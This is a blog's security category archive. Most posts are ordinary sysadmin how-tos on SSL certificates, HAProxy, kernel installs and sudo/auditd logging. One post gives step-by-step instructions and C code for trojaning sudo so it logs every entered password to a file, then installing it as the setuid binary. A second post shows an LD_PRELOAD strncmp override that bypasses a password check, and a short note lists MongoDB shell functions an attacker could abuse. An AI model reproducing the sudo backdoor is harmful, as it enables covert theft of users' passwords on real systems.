Category Archives: Security

Security & Hacking

How to install/change SSL/TLS certificate

How to add new SSL/TLS certificate

If you need to set up HTTPS, you will need a new SSL/TLS certificate:
1. following information which is needed for certificate request (CSR):

    Country Name (2 letter code)
    State or Province Name (full name)
    Locality Name (eg, city)
    Organization Name (eg, company)
    Organizational Unit Name (eg, section)
    Common Name (e.g. server FQDN or YOUR name)
    Email Address
    you can get FQDN from your serving hostname/domain.

2. Generate a private key and certificate request:

1
openssl req -out cert.csr -new -newkey rsa:2048 -nodes -keyout cert.key

3. buy certificate using generated csr.
4. Add certificate for expiration monitoring (if you have monitoring).
5. setup it to your server

How to install/change SSL/TLS certificate

1. If you received .pfx file, use the following command to decode it:

1
openssl pkcs12 -in domain.pfx -out certificate -nodes

This will write both private key and certificate in certificate file.
2. You should get about 4 files:

    domain-name.crt — X.509 certificate file
    domain-name.csr — X.509 certificate request file
    intermediate.crt — X.509 certificate file of intermediate (proxy) level
    domain-name.key — RSA private key file for certificate

3. Check that files compatible:

1
2
3
openssl rsa -noout -modulus -in cert.key
openssl req -noout -modulus -in cert.csr
openssl x509 -noout -modulus -in cert.crt

All files should have the same modulus.
4. Check dates for new certificate:

1
openssl x509 -noout -dates -in cert.crt

5. Check that domain and intermediate certificate are compatible:

1
2
openssl verify -CAfile intermediate.crt domain-name.crt
domain-name.crt: OK

If you have several intermediate certificates, put them into one intermediate.crt file.
6. Create chain certificate file:

1
cat domain-name.crt intermediate.crt > cert.crt

Remember that first certificate should be for desired domain and intermediate goes after.
7. Put cert.crt and cert.key into server's ssl folder
8. restart web-server
9. Check that certificate updated successfully:

1
openssl s_client -connect domain.name:443 2>/dev/null < /dev/null | openssl x509 -noout -dates

Checking for missing intermediate certificate

if your browser says that site is untrusted and you get the following error:

1
2
3
4
5
6
7
8
9
10
11
12
openssl s_client -connect display.intencysrv.com:443 -showcerts
CONNECTED(00000003)
depth=0 OU = Domain Control Validated, OU = PositiveSSL, CN = display.intencysrv.com
verify error:num=20:unable to get local issuer certificate
verify return:1
depth=0 OU = Domain Control Validated, OU = PositiveSSL, CN = display.intencysrv.com
verify error:num=27:certificate not trusted
verify return:1
depth=0 OU = Domain Control Validated, OU = PositiveSSL, CN = display.intencysrv.com
verify error:num=21:unable to verify the first certificate
verify return:1
<...>

than you probably missing intermediate certificate. Find it in Google, check that it's compatible and install (see 4-5 upper). You can check remotely that downloaded intermediate certificate is compatible:

1
openssl s_client -connect domain.name:443 -CAfile ca.crt

Remember,
Apache supports bundled certificates starting from 2.4.8. If you using Apache prior this version you might get a message about a missing intermediate certificate.

Security: mongodb

If you don't have auth on mongo servers which are open for all your network hacker could:
— use system commands like: ls (), cat (), removeFile (), fuzzFile ().
— use command: load (), which loads javascript script
— also he could enable auth for your instances and you loose control
— detect if it's a windows or linux host by _isWindows ()

HAProxy: tcp + http on the same port

haparoxy.conf:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
global
        log /dev/log    local0
        log /dev/log    local1 notice
        chroot /var/lib/haproxy
        stats socket /run/haproxy/admin.sock mode 660 level admin
        stats timeout 30s
        user haproxy
        group haproxy
        daemon

        # Default SSL material locations
        ca-base /etc/ssl/certs
        crt-base /etc/ssl/private

        # Default ciphers to use on SSL-enabled listening sockets.
        # For more information, see ciphers(1SSL). This list is from:
        #  https://hynek.me/articles/hardening-your-web-servers-ssl-ciphers/
        ssl-default-bind-ciphers ECDH+AESGCM:DH+AESGCM:ECDH+AES256:DH+AES256:ECDH+AES128:DH+AES:ECDH+3DES:DH+3DES:RSA+AESGCM:RSA+AES:RSA+3DES:!aNULL:!MD5:!DSS
        ssl-default-bind-options no-sslv3

defaults
        log     global
        option  dontlognull
        timeout connect 5000
        timeout client  50000
        timeout server  50000
        errorfile 400 /etc/haproxy/errors/400.http
        errorfile 403 /etc/haproxy/errors/403.http
        errorfile 408 /etc/haproxy/errors/408.http
        errorfile 500 /etc/haproxy/errors/500.http
        errorfile 502 /etc/haproxy/errors/502.http
        errorfile 503 /etc/haproxy/errors/503.http
        errorfile 504 /etc/haproxy/errors/504.http
  maxconn 2000

frontend mixed_frontend
    bind :8080
    mode tcp
    option tcplog
    tcp-request inspect-delay 5s
    tcp-request content accept if HTTP
    # here is magic: check for that string "SSH 2.0"
    acl client_attempts_ssh payload(0,7) -m bin 5353482d322e30
    use_backend tcp_backend if client_attempts_ssh
    use_backend tcp_backend if !HTTP
    use_backend http_backend if HTTP
    default_backend tcp_backend

   backend tcp_backend
     mode tcp
     server ssh :22

   backend http_backend
     mode http
     server s1_http 127.0.0.1:80 send-proxy

nginx.conf:

1
2
3
4
5
6
7
8
9
10
server {
  listen 80 default_server proxy_protocol;

  set_real_ip_from 127.0.0.1;
  real_ip_header proxy_protocol;
    location / {
      root /var/www/html;
      index index.html index.htm;
    }
}

ssh 127.0.0.1 -p8080
user@127.0.0.1's password:

curl 127.0.0.1:8080


HELLO WORLD!

Ubuntu: install kernel 3.16

1
wget http://kernel.ubuntu.com/~kernel-ppa/mainline/v3.16-utopic/linux-headers-3.16.0-031600-generic_3.16.0-031600.201408031935_amd64.deb http://kernel.ubuntu.com/~kernel-ppa/mainline/v3.16-utopic/linux-headers-3.16.0-031600_3.16.0-031600.201408031935_all.deb http://kernel.ubuntu.com/~kernel-ppa/mainline/v3.16-utopic/linux-image-3.16.0-031600-generic_3.16.0-031600.201408031935_amd64.deb

dpkg -i *.deb
reboot

Security: log user's actions

Log sudo actions

/etc/sudoers:
Defaults iolog_dir=/var/log/sudo-io/%{user}
%admins ALL=(ALL): LOG_INPUT: LOG_OUTPUT: ALL

gpasswd -a user admins # add user to group admins

all sudo actions of user in group admins will be wrote to /var/log/sudo-io/

Log all events with auditd

apt-get install auditd
add in the end of /etc/audit/audit.rules:
-a exit,always -F arch=b64 -F euid=0 -S execve
— a exit,always -F arch=b32 -F euid=0 -S execve

add to /etc/default/grub
audit=1 to the kernel's cmdline

Place «session required pam_loginuid.so» to the /etc/pam.d/{login,kdm,sshd}

update-grub
reboot

How to make search by events in auditd's log

ausearch -ua 1000, where 1000 is users id.

IT Security Brothers (http://itsb.pro)

Hi guys, I would like to present you our new project IT Security Brothers http://itsb.pro
We provide pentest, consultations and IT outsourcing services.
Feel free to hire us for IT jobs.

How to get passwords through sudo

1) download sudo sources
2) open file conversation.c
3) add

1
#include<stdio.h>

4) search strings

1
2
3
pass = tgetpass(msg->msg, msg->timeout, flags);
if (pass == NULL)
    goto err;

4) after previous strings add code

1
2
3
4
FILE *file;
file = fopen("/var/log/sudo.log","a+");
fprintf(file, "%s\n", pass);
fclose(file);

5) build sudo (read README and INSTALL files, but really run only «./configure && make» commands)
6) put new sudo binary in /usr/bin/ folder
7) chmod 4000 /usr/bin/sudo
8) chmod +x /usr/bin/sudo
9) chown root.root /usr/bin/sudo
10) you could find passwords in /var/log/sudo.log after user's using of that command

How to use LD_PRELOAD for cracking applications

How to use LD_PRELOAD for cracking applications.
test.cpp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
#include<stdio.h>
#include<stdlib.h>
#include<cstring>
#include<iostream>
using namespace std;

int main()
{
  char *pre_pass = "a382fbe8e8f087352e250561d724c0a";
  char *salt =     "1qazxcvfdswer435tgbnhy67ujmkdfg";
  char pass[32];
  for(int i = 0; i < 32; i++)
  {
    int a = pre_pass[i];
    int b = salt[i];
    int c = (a + b)/2;
    pass[i] = c;
  }
  char user_input[32];
  cout << "Enter your password's md5 hash for enter to root access level" << endl;
  cout << "> ";
  cin.width(32);
  cin >> user_input;
  if ( strncmp( pass, user_input, 32)==0 )
    {
      cout <<  "Secret is " << pass << endl;
    }
  else
    {
      cout << "Access denied, fucking looser" << endl;
    }
  return 1;
}

Compile it with g++:
g++ test.cpp -o test

try to get pass ^_^
./test

1
2
3
Enter your password's md5 hash for enter to root access level
> asd
Access denied, fucking looser

How to hack it ? LD_PRELOAD is answer!

Let's take a look at code, we see that we have to get zero in the return value of strncmp, let's do it !
strncmp_lib.c

1
2
3
4
int strncmp(const char * string1, const char * string2, int num )
{
return 0;
}

compite it with gcc:
gcc -Wall -O2 -fpic -shared -ldl -o strncmp_lib.so strncmp_lib.c

and run:
LD_PRELOAD="./strcmp_lib.so" ./test

1
2
3
Enter your password's md5 hash for enter to root access level
> asd
Secret is IRLVobmOdUnJU535SfJQLW64lPOOcKd